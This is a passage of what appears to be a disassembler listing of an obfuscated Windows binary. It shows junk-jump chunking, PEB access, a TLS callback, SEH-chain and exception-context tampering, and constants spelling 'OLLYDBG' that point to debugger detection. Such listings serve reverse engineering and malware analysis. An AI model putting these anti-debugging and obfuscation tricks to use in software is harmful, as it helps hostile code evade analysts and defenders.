mov edx, [ebp-14h]
mov edx, [edx+1Ch]
add edx, [ebp-4]
add eax, edx
mov eax, [eax]
jmp loc_4268AE
; END OF FUNCTION CHUNK FOR sub_42DA2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD86
loc_4293B2: ; CODE XREF: sub_42DD86:loc_42AA29�j
jz loc_42B7E2
jmp loc_427FD5
; END OF FUNCTION CHUNK FOR sub_42DD86
; ---------------------------------------------------------------------------
ja loc_42CF08
jmp sub_42894D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424184
loc_4293C8: ; CODE XREF: sub_424184+141C�j
jnp loc_42B7D3
loc_4293CE: ; CODE XREF: sub_42D33D:loc_42D945�j
call sub_429BB9
push offset loc_42DC40
jmp loc_42CB76
; END OF FUNCTION CHUNK FOR sub_424184
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A642
loc_4293DD: ; CODE XREF: sub_42A642:loc_4254CE�j
adc edx, esi
and ebx, ebp
jmp loc_42CDB9
; END OF FUNCTION CHUNK FOR sub_42A642
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AB27
loc_4293E6: ; CODE XREF: sub_42AB27:loc_429343�j
lea eax, [ebp+var_20]
mov dword ptr [eax], 594C4C4Fh
lea eax, [ebp+var_1C]
mov dword ptr [eax], 474244h
jmp loc_426812
; END OF FUNCTION CHUNK FOR sub_42AB27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4267F8
loc_4293FD: ; CODE XREF: sub_4267F8:loc_42368C�j
inc dword ptr [ebp-8]
inc dword ptr [ebp-4]
jmp loc_42D114
; END OF FUNCTION CHUNK FOR sub_4267F8
; =============== S U B R O U T I N E =======================================
sub_429408 proc near ; CODE XREF: sub_423CEA:loc_423CED�p
mov eax, 1Dh
retn
sub_429408 endp
; =============== S U B R O U T I N E =======================================
sub_42940E proc near ; CODE XREF: _0182ofla:00427BD6�j
; sub_428FD6:loc_428FE3�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 004243CE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004250CF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004258B1 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00426CA7 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00426FF9 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00427BFB SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042882A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AD33 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042CE32 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D0D5 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042E8D8 SIZE 00000005 BYTES
mov [esp+0], eax
pop eax
mov esp, ebp
pop ebp
mov eax, ds:dword_4231A0
or eax, eax
jmp loc_4250CF
sub_42940E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_429422: ; CODE XREF: _0182ofla:loc_42CECA�j
jmp loc_423EBC
; ---------------------------------------------------------------------------
jmp loc_42DD4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DA9
loc_42942C: ; CODE XREF: sub_427DA9:loc_42848C�j
mov eax, large fs:30h
call sub_42486B
; END OF FUNCTION CHUNK FOR sub_427DA9
; START OF FUNCTION CHUNK FOR sub_42AB3E
loc_429438: ; CODE XREF: sub_42AB3E:loc_4238E5�j
jnz loc_42C27E
jmp loc_42B073
; END OF FUNCTION CHUNK FOR sub_42AB3E
; ---------------------------------------------------------------------------
cmp edi, ebp
jmp loc_42402A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C553
loc_42944A: ; CODE XREF: sub_42C553-831F�j
jge loc_428B44
push 0B593BCBDh
pop ebx
jmp loc_428B44
; END OF FUNCTION CHUNK FOR sub_42C553
; =============== S U B R O U T I N E =======================================
sub_42945B proc near ; CODE XREF: _0182ofla:004272AE�p
; FUNCTION CHUNK AT 004266C1 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004275C2 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
imul dword ptr [edx-4]
add eax, 2
mov [ebp-0Ch], eax
mov eax, [ebp-0Ch]
jmp loc_4266C1
sub_42945B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_429470: ; CODE XREF: sub_42798F-883�j
mov eax, [ebp+8]
push eax
call sub_428B26
xchg esi, edx
jmp loc_42E6FA
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253DC
loc_429480: ; CODE XREF: sub_4253DC-180C�j
; sub_4253DC:loc_429C93�j
call sub_428D09
push 9CD1DFFAh
pop edx
add edx, 0E4706EEDh
call sub_42D71D
push ecx
mov [esp+0], eax
push offset sub_428CFF
jmp loc_424C8A
; END OF FUNCTION CHUNK FOR sub_4253DC
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4294A4 proc near ; CODE XREF: sub_428A39:loc_428510�j
retn
sub_4294A4 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D833
loc_4294A5: ; CODE XREF: sub_42D833+36C�j
jmp loc_42E63B
; END OF FUNCTION CHUNK FOR sub_42D833
; =============== S U B R O U T I N E =======================================
sub_4294AA proc near ; CODE XREF: sub_427942+E75�p
; _0182ofla:0042A2A7�j
; FUNCTION CHUNK AT 0042D662 SIZE 00000005 BYTES
mov [esp+0], ebx
pop ebx
call sub_42CA48
pop ecx
mov [ebp-20h], eax
jmp loc_42D662
sub_4294AA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427942
loc_4294BC: ; CODE XREF: sub_427942:loc_4287A3�j
test [ebp+var_8], 2
push offset sub_425B00
jmp loc_426798
; END OF FUNCTION CHUNK FOR sub_427942
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425DA5
loc_4294CA: ; CODE XREF: sub_425DA5-54B�j
jnz loc_42B581
jmp loc_42B25D
; END OF FUNCTION CHUNK FOR sub_425DA5
; ---------------------------------------------------------------------------
push offset sub_4233F8
jmp locret_42EC2B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428729
loc_4294DF: ; CODE XREF: sub_428729+4610�j
test eax, eax
jnz loc_42808A
jmp loc_42C57F
; END OF FUNCTION CHUNK FOR sub_428729
; ---------------------------------------------------------------------------
cmp edi, 24177767h
jmp loc_4256A0
; ---------------------------------------------------------------------------
mov [ecx], esi
jmp sub_423D2D
; =============== S U B R O U T I N E =======================================
sub_4294FE proc near ; CODE XREF: sub_429BEC:loc_42335B�p
; _0182ofla:0042A538�j
; FUNCTION CHUNK AT 004234B3 SIZE 0000001C BYTES
mov [esp+0], ecx
pop ecx
push 90FE93BBh
pop ebx
jmp loc_4234B3
sub_4294FE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A39
loc_42950D: ; CODE XREF: sub_428A39-5107�j
call sub_42E668
loc_429512: ; CODE XREF: _0182ofla:00428DCD�j
jmp loc_42A699
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42537E
loc_429517: ; CODE XREF: sub_42537E+2DD2�j
jmp loc_42C5FD
; END OF FUNCTION CHUNK FOR sub_42537E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42448C
loc_42951C: ; CODE XREF: sub_42448C:loc_42AA86�j
mov eax, [ebp+var_10]
mov eax, [eax+60h]
jmp loc_42E235
; END OF FUNCTION CHUNK FOR sub_42448C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4256AD
loc_429527: ; CODE XREF: sub_4256AD:loc_426ADD�j
xor eax, eax
push offset loc_425B3A
jmp nullsub_144
; END OF FUNCTION CHUNK FOR sub_4256AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D15D
loc_429533: ; CODE XREF: sub_42D15D:loc_427210�j
mov [esp+0], ecx
mov ecx, [esp+arg_C]
mov dword ptr [ecx], 10001h
lea eax, loc_42743A
mov [ecx+0B8h], eax
push 206E9768h
jmp loc_42DA97
; END OF FUNCTION CHUNK FOR sub_42D15D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FE2
loc_429556: ; CODE XREF: sub_423FE2:loc_428E46�j
pop esi
and esi, ds:4000F2h
add esi, 0FF26C293h
jmp loc_428C63
; END OF FUNCTION CHUNK FOR sub_423FE2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429E52
loc_429568: ; CODE XREF: sub_429E52+128F�j
shr ecx, 17h
loc_42956B: ; CODE XREF: sub_429E52:loc_42AB75�j
push 1238EA97h
pop eax
or eax, 4F350BE9h
sub eax, 0B11A8DA8h
jnz loc_426966
loc_429583: ; CODE XREF: sub_428F46-2525�j
jmp loc_424D77
; END OF FUNCTION CHUNK FOR sub_429E52
; ---------------------------------------------------------------------------
and edi, esi
jmp loc_42DD10
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42537E
loc_42958F: ; CODE XREF: sub_42537E:loc_4249AD�j
ja loc_426BEA
or edi, ebx
; END OF FUNCTION CHUNK FOR sub_42537E
; =============== S U B R O U T I N E =======================================
sub_429597 proc near ; CODE XREF: sub_42E734-95D5�p
; FUNCTION CHUNK AT 0042D1BC SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042E6E3 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push 0
mov edx, esp
push edx
jmp loc_42E6E3
sub_429597 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_4295A5: ; CODE XREF: sub_4253F4:loc_423D7D�j
mov ecx, esp
add ecx, 10h
mov ecx, [ecx]
mov dword ptr [ecx], 10013h
add ecx, 18h
mov al, [ecx]
loc_4295BD: ; CODE XREF: TlsCallback_0:loc_424AF8�j
add ecx, 9Ch
add [ecx], al
jmp loc_424D15
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
loc_4295CA: ; CODE XREF: _0182ofla:00426F2E�j
sbb edi, edx
mov eax, esi
sub esi, edx
jmp loc_4287EB
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4295D6 proc near ; CODE XREF: sub_4230AC+4�p
; sub_428041-4026�p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423799 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00423F83 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00424FBD SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00427290 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042729C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042861F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042A3BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DEBA SIZE 00000005 BYTES
jnb loc_42861F
call sub_428BBF
loc_4295E1: ; CODE XREF: _0182ofla:0042C181�j
jmp nullsub_54
sub_4295D6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 8A0Fh
dd 0FFFFB577h, 17F2E9h
db 0, 81h, 0C1h
dd 2652F980h
; ---------------------------------------------------------------------------
xchg ecx, [esp]
jmp sub_42371C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DA9
loc_4295FF: ; CODE XREF: sub_427DA9+6F1�j
push 2F496BAAh
pop ecx
rol ecx, 0Ah
xor ecx, 25AEA8E9h
add eax, ecx
push offset sub_424E80
jmp nullsub_208
; END OF FUNCTION CHUNK FOR sub_427DA9
; ---------------------------------------------------------------------------
xor ecx, 0EE5AD7B0h
jmp sub_42DF61
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E689
loc_429625: ; CODE XREF: sub_42E689:loc_42EBB7�j
push ecx
jmp loc_428329
; END OF FUNCTION CHUNK FOR sub_42E689
; ---------------------------------------------------------------------------
xchg esi, [edi]
jmp sub_427EAF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4242FD
loc_429632: ; CODE XREF: sub_4242FD+5�j
push 71D7E985h
pop edi
and edi, 5570FC30h
cmp edi, 0A33452D7h
jmp loc_42720A
; END OF FUNCTION CHUNK FOR sub_4242FD
; ---------------------------------------------------------------------------
loc_429649: ; CODE XREF: _0182ofla:0042AD0F�j
pop edx
jz loc_42743A
mov eax, 63h
call sub_4265C0
jmp loc_427504
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42965F: ; CODE XREF: sub_423A2A:loc_4246C3�j
jnz loc_423E3C
jmp loc_42591C
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
jmp loc_423E3C
; =============== S U B R O U T I N E =======================================
sub_42966F proc near ; CODE XREF: sub_42966F-436F�j
; sub_4269D9+D�j ...
; FUNCTION CHUNK AT 0042363A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004252F6 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004269EB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004275BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428FE8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CF54 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042E413 SIZE 0000000B BYTES
mov edx, 1
lock xchg edx, [eax]
or edx, edx
jz locret_427A5F
loc_42967F: ; CODE XREF: sub_42966F-4375�j
; sub_4269D9+7�j
js loc_4269EB
jmp loc_428FE8
sub_42966F endp
; ---------------------------------------------------------------------------
loc_42968A: ; CODE XREF: _0182ofla:0042DD9F�j
cdq
; =============== S U B R O U T I N E =======================================
sub_42968B proc near ; CODE XREF: sub_425048+1EE�p
; FUNCTION CHUNK AT 00424379 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004249EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425169 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00426071 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00428DF1 SIZE 00000017 BYTES
mov [esp+0], ebx
pop ebx
or eax, eax
jnz loc_426075
jmp loc_424379
sub_42968B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D8FF
loc_42969C: ; CODE XREF: sub_42D8FF+A�j
push offset loc_425391
jmp loc_42865D
; END OF FUNCTION CHUNK FOR sub_42D8FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42349B
loc_4296A6: ; CODE XREF: sub_42349B+31F8�j
; _0182ofla:loc_4271C6�j
push 0
loc_4296A8: ; CODE XREF: _0182ofla:0042E85D�j
push eax
push 80FB4907h
pop eax
or eax, ds:4000F2h
rol eax, 0Ah
xor eax, 0FD275E47h
jmp loc_426EC2
; END OF FUNCTION CHUNK FOR sub_42349B
; ---------------------------------------------------------------------------
loc_4296C3: ; CODE XREF: _0182ofla:loc_423510�j
xchg ecx, [esp]
mov edx, ecx
pop ecx
sub edx, 5541D349h
add edx, 2D6139E0h
xor edx, 0B78730CAh
jmp loc_42677F
; ---------------------------------------------------------------------------
push 0E15DE63Eh
xchg ebp, [esp]
mov edx, ebp
pop ebp
jmp loc_425FFE
; =============== S U B R O U T I N E =======================================
sub_4296F0 proc near ; CODE XREF: sub_426455+4�p
; sub_428D63:loc_42D132�j
; FUNCTION CHUNK AT 00427CB8 SIZE 0000000A BYTES
mov [esp+0], eax
pop eax
or eax, eax
jnz loc_427CB8
call sub_425BF8
or eax, eax
jnz nullsub_56
jmp loc_427CB8
sub_4296F0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427E42
loc_42970E: ; CODE XREF: sub_427E42+10�j
jnz loc_423C23
pop ebp
xchg ecx, ebx
jmp loc_423C20
; END OF FUNCTION CHUNK FOR sub_427E42
; ---------------------------------------------------------------------------
popf
jmp sub_42E43C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42660C
loc_429722: ; CODE XREF: sub_42660C+10�j
jz loc_425F39
jmp loc_4278E5
; END OF FUNCTION CHUNK FOR sub_42660C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429242
loc_42972D: ; CODE XREF: sub_429242:loc_42B85A�j
pop ebx
xor ebx, 0E4654642h
add ebx, 0E637800Ah
xchg ebx, [esp+0]
jmp sub_428D17
; END OF FUNCTION CHUNK FOR sub_429242
; ---------------------------------------------------------------------------
loc_429742: ; DATA XREF: _0182ofla:00424EA8�o
push eax
push edi
push offset loc_426D24
jmp loc_42E116
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42974E: ; CODE XREF: sub_42798F:loc_427A48�j
call sub_42966F
cmp ds:dword_42A3B4, 0
jnz loc_42E4E2
lea edx, [ebp-14h]
push offset sub_423057
jmp nullsub_57
; END OF FUNCTION CHUNK FOR sub_42798F
; =============== S U B R O U T I N E =======================================
sub_42976D proc near ; CODE XREF: _0182ofla:004241C1�j
; sub_429BEC:loc_429816�p
xchg eax, [esp+0]
sub_42976D endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42B15E
loc_429770: ; CODE XREF: sub_42B15E:loc_4237CC�j
pop eax
pop ebx
call sub_426EA9
loc_429777: ; CODE XREF: sub_42EAB7-26E4�j
jmp loc_42D3A9
; END OF FUNCTION CHUNK FOR sub_42B15E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9A4
loc_42977C: ; CODE XREF: sub_42D9A4-8660�j
jmp loc_425CDC
; END OF FUNCTION CHUNK FOR sub_42D9A4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425A3C
loc_429781: ; CODE XREF: sub_425A3C-177D�j
jmp locret_42E412
; END OF FUNCTION CHUNK FOR sub_425A3C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E5F8
loc_429786: ; CODE XREF: sub_42E5F8+D�j
jnz loc_42D884
jmp loc_42CF73
; END OF FUNCTION CHUNK FOR sub_42E5F8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_232. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A760
loc_429792: ; CODE XREF: sub_42A760-1B62�j
jmp loc_423A6B
; END OF FUNCTION CHUNK FOR sub_42A760
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_27. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9A4
loc_429798: ; CODE XREF: sub_42D9A4-268F�j
jmp loc_4273A2
; END OF FUNCTION CHUNK FOR sub_42D9A4
; ---------------------------------------------------------------------------
shr edi, 1Dh
jmp loc_42B180
; ---------------------------------------------------------------------------
loc_4297A5: ; DATA XREF: sub_424CD8+1�o
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp-4], eax
call nullsub_9
; START OF FUNCTION CHUNK FOR sub_42448C
loc_4297B2: ; CODE XREF: sub_42448C:loc_428E15�j
mov eax, [ebp+var_4]
jmp loc_4262C5
; END OF FUNCTION CHUNK FOR sub_42448C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CC59
loc_4297BA: ; CODE XREF: sub_42CC59+4�j
mov eax, [ebp-8]
mov dword ptr [ebp+eax*4-70h], 73257325h
inc dword ptr [ebp-8]
cmp dword ptr [ebp-8], 19h
jnz loc_427C56
xor eax, eax
jmp loc_42D29F
; END OF FUNCTION CHUNK FOR sub_42CC59
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EC1A
loc_4297D9: ; CODE XREF: sub_42EC1A+C�j
add eax, ebp
; END OF FUNCTION CHUNK FOR sub_42EC1A
; START OF FUNCTION CHUNK FOR sub_42AAF8
loc_4297DB: ; CODE XREF: sub_42AAF8-4B80�j
add eax, 7468A4D0h
mov eax, [eax]
call sub_4298DD
; END OF FUNCTION CHUNK FOR sub_42AAF8
; START OF FUNCTION CHUNK FOR sub_42C2F0
loc_4297E8: ; CODE XREF: sub_42C2F0+1F83�j
jmp loc_4282C5
; END OF FUNCTION CHUNK FOR sub_42C2F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42448C
loc_4297ED: ; CODE XREF: sub_42448C:loc_42626F�j
jnz loc_42303F
jmp loc_4299C6
; ---------------------------------------------------------------------------
loc_4297F8: ; CODE XREF: sub_4278DB-749�j
; sub_42448C:loc_42A92B�j
call sub_428D17
mov edx, 17B3C1CFh
call sub_42D71D
call sub_429AB1
loc_42980C: ; CODE XREF: sub_4256AD+322�j
jmp loc_42CBFB
; END OF FUNCTION CHUNK FOR sub_42448C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_429811: ; CODE XREF: sub_428F20-4158�j
jmp loc_42E833
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429BEC
loc_429816: ; CODE XREF: sub_429BEC+55B�j
call sub_42976D
locret_42981B: ; CODE XREF: sub_42A4C6:loc_42A477�j
retn
; END OF FUNCTION CHUNK FOR sub_429BEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DB2E
loc_42981C: ; CODE XREF: sub_42DB2E-56C0�j
jmp loc_424374
; END OF FUNCTION CHUNK FOR sub_42DB2E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426851
loc_429821: ; CODE XREF: sub_426851-2A2F�j
jmp loc_42787B
; END OF FUNCTION CHUNK FOR sub_426851
; ---------------------------------------------------------------------------
xor edi, esi
mov ebx, 3C472F19h
sub edi, ebx
mov edx, [edi]
; START OF FUNCTION CHUNK FOR sub_423AF2
loc_429831: ; CODE XREF: sub_423AF2+2B0F�j
jmp loc_428456
; END OF FUNCTION CHUNK FOR sub_423AF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EAB7
loc_429836: ; CODE XREF: sub_42EAB7+10�j
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
mov eax, ds:dword_42B8F8[eax*4]
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jmp loc_429B8C
; END OF FUNCTION CHUNK FOR sub_42EAB7
; ---------------------------------------------------------------------------
loc_42984F: ; DATA XREF: sub_427259:loc_428AAB�o
call sub_428D17
mov edx, 24CC2B1h
call sub_42D71D
push eax
; START OF FUNCTION CHUNK FOR sub_4291BA
loc_42985F: ; CODE XREF: sub_4291BA:loc_424D97�j
ror eax, 3
push ebx
push 0BB6589Fh
pop ebx
jmp loc_42539E
; END OF FUNCTION CHUNK FOR sub_4291BA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_157. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
locret_42986F: ; CODE XREF: _0182ofla:loc_42B2FA�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423861
loc_429870: ; CODE XREF: sub_423861+A7F2�j
push offset loc_42A2E5
jmp loc_42B1DD
; END OF FUNCTION CHUNK FOR sub_423861
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_103. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42987B: ; CODE XREF: sub_42D056-7973�j
jp loc_429319
loc_429881: ; DATA XREF: sub_426851+104C�o
pop dword ptr fs:0
xchg eax, [esp+4+var_4]
pop eax
cmp ecx, edx
mov ebx, offset loc_4254B7
xchg ebx, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4256AD
loc_429896: ; CODE XREF: sub_4256AD+13�j
jmp loc_42D6BD
; END OF FUNCTION CHUNK FOR sub_4256AD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_159. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B669
loc_42989C: ; CODE XREF: sub_42B669:loc_42D8B9�j
; DATA XREF: _0182ofla:loc_425034�o
mov eax, ds:dword_42E8E4
or eax, eax
jnz loc_42C839
jmp loc_4244C2
; END OF FUNCTION CHUNK FOR sub_42B669
; ---------------------------------------------------------------------------
xor edx, ebx
jmp sub_4269D9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_39. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427DA9
loc_4298B7: ; CODE XREF: sub_427DA9+48BA�j
jmp loc_423B7B
; END OF FUNCTION CHUNK FOR sub_427DA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A17
loc_4298BC: ; CODE XREF: sub_428A17+3�j
jmp sub_42C197
; END OF FUNCTION CHUNK FOR sub_428A17
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42310C
loc_4298C1: ; CODE XREF: sub_42310C+3�j
jmp loc_42EA61
; END OF FUNCTION CHUNK FOR sub_42310C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FE2
loc_4298C6: ; CODE XREF: sub_423FE2:loc_428C63�j
xchg esi, [esp+0]
push edx
push 3BCF1A7h
pop edx
xor edx, 2C70BDh
add edx, ebp
jmp loc_42358D
; END OF FUNCTION CHUNK FOR sub_423FE2
; =============== S U B R O U T I N E =======================================
sub_4298DD proc near ; CODE XREF: sub_42AAF8-1315�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423167 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423E82 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042492F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424C30 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004251D8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00425575 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00425DED SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004264B8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042676A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00426802 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004268B3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426B53 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00426CA2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427315 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004285E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429370 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00429E67 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042B193 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B2BD SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042B8BE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042C12D SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0042C8E9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042C9BF SIZE 00000027 BYTES
; FUNCTION CHUNK AT 0042D3C9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E368 SIZE 00000008 BYTES
mov [esp+0], eax
call sub_42CA29
test eax, eax
jz loc_426802
jmp loc_4285E9
sub_4298DD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_4298F2: ; CODE XREF: sub_42798F+7D0�j
jz loc_42683C
jmp loc_428E77
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
rol ebp, 1Ch
shl ebx, 0Bh
jmp sub_42E35C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424184
loc_429908: ; CODE XREF: sub_424184:loc_42302B�j
mov [ebx], ecx
cdq
jle loc_426A45
jmp loc_42328D
; END OF FUNCTION CHUNK FOR sub_424184
; ---------------------------------------------------------------------------
locret_429916: ; CODE XREF: _0182ofla:0042E2AE�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A5FC
loc_429917: ; CODE XREF: sub_42A5FC+12�j
jmp loc_42E4D1
; END OF FUNCTION CHUNK FOR sub_42A5FC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ECAD
loc_42991C: ; CODE XREF: sub_42ECAD:loc_42ECBB�j
push offset sub_4263F0
jmp loc_427B95
; END OF FUNCTION CHUNK FOR sub_42ECAD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_429926: ; CODE XREF: sub_4282B8:loc_42A120�j
jmp loc_424AA0
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
jmp loc_42E027
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A181
loc_429930: ; CODE XREF: sub_42A181:loc_42484C�j
push offset sub_427DA9
jmp nullsub_207
; END OF FUNCTION CHUNK FOR sub_42A181
; ---------------------------------------------------------------------------
dw 8A0Fh
dd 0FFFFB77Ch, 129EC181h, 35E9E9AEh
db 0A7h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42994B: ; CODE XREF: _0182ofla:004244B7�j
